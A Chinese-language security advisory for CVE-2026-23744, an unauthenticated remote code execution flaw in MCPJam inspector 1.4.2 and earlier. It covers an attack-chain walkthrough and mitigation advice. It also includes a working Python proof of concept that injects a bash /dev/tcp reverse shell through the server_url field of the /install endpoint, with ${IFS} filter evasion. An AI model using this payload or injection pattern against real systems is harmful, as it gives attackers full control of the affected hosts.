CVE-2026-23744 MCPJam inspector 远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2026-23744

漏洞类型

远程代码执行(RCE)

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

MCPJam inspector

漏洞概述

MCPJam inspector是一款面向MCP服务器的本地优先开发平台。该产品在1.4.2及更早版本中存在严重的远程代码执行(RCE)漏洞。攻击者可以通过发送精心构造的HTTP请求，触发MCP服务器的安装过程，从而在目标系统上执行任意代码。更为严重的是，由于MCPJam inspector默认监听0.0.0.0而非127.0.0.1，导致该服务直接暴露在网络环境中，攻击者无需任何认证即可远程利用此漏洞。CVSS评分高达9.8，属于极其危险的漏洞。攻击者可以利用此漏洞完全控制受影响系统，窃取敏感数据、植入后门或进行横向移动。建议受影响的用户立即升级到1.4.3或更高版本。

技术细节

漏洞根因在于MCPJam inspector在处理HTTP请求时缺乏充分的输入验证。当收到特制的请求时，系统会触发MCP服务器的自动安装流程，而安装过程中未对请求参数进行安全过滤。攻击者可以通过构造包含恶意命令的HTTP请求，利用系统调用或脚本执行功能实现代码注入。由于服务默认绑定到0.0.0.0，任何能够访问该端口的网络用户都可以发送恶意请求。具体利用方式涉及在请求中嵌入系统命令或脚本代码，当服务器处理安装请求时，这些代码会被传递给底层系统执行。攻击者通常会利用wget/curl等工具下载并执行恶意脚本，或直接通过管道等方式注入shell命令。

攻击链分析

STEP 1

步骤1

探测目标：攻击者首先扫描互联网或内网中运行MCPJam inspector的服务器，确认服务监听0.0.0.0且端口可访问

STEP 2

步骤2

发送恶意HTTP请求：攻击者构造包含RCE payload的HTTP POST请求，目标是触发MCP服务器安装端点

STEP 3

步骤3

注入恶意命令：payload通过server_url参数注入系统命令，如反弹shell命令或下载执行恶意脚本

STEP 4

步骤4

执行代码：服务器在处理安装请求时，未经验证即将payload传递给系统shell执行，实现远程代码执行

STEP 5

步骤5

建立持久化访问：攻击者获得shell后通常会植入后门、窃取数据或进行内网横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-23744 PoC - MCPJam inspector RCE
# Target: MCPJam inspector <= 1.4.2

def exploit(target_url, attacker_ip, attacker_port):
    """
    Exploit CVE-2026-23744 by sending a crafted HTTP request
    that triggers MCP server installation with RCE payload
    """
    # Reverse shell payload
    payload = f"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1"
    encoded_payload = payload.replace(" ", "${IFS}")
    
    # PoC: Trigger MCP server installation with malicious command
    exploit_url = f"{target_url}/install"
    
    headers = {
        'Content-Type': 'application/json',
        'User-Agent': 'MCPJam-Installer/1.4.2'
    }
    
    # Crafted request that exploits the RCE during MCP server installation
    data = {
        'server_url': f"http://malicious.com/server && {encoded_payload}",
        'auto_install': True,
        'force': True
    }
    
    print(f"[*] Sending exploit payload to {exploit_url}")
    print(f"[*] Payload: {payload}")
    
    try:
        response = requests.post(exploit_url, json=data, headers=headers, timeout=10)
        print(f"[+] Request sent, status code: {response.status_code}")
        print(f"[*] Response: {response.text[:200]}")
        return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <attacker_ip> <attacker_port>")
        print(f"Example: python {sys.argv[0]} http://target.com:8080 192.168.1.100 4444")
        sys.exit(1)
    
    target = sys.argv[1]
    lhost = sys.argv[2]
    lport = sys.argv[3]
    
    # Start listener in another terminal: nc -lvnp 4444
    exploit(target, lhost, lport)

影响范围

MCPJam inspector <= 1.4.2

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1)使用防火墙或安全组规则限制对MCPJam inspector端口的访问，仅允许受信任的IP地址连接；2)临时停止服务或将其绑定到本地回环地址127.0.0.1；3)启用网络ACL和流量监控，检测异常的HTTP请求模式；4)实施Web应用防火墙(WAF)规则，拦截包含可疑命令参数的请求；5)监控日志中的异常安装请求行为。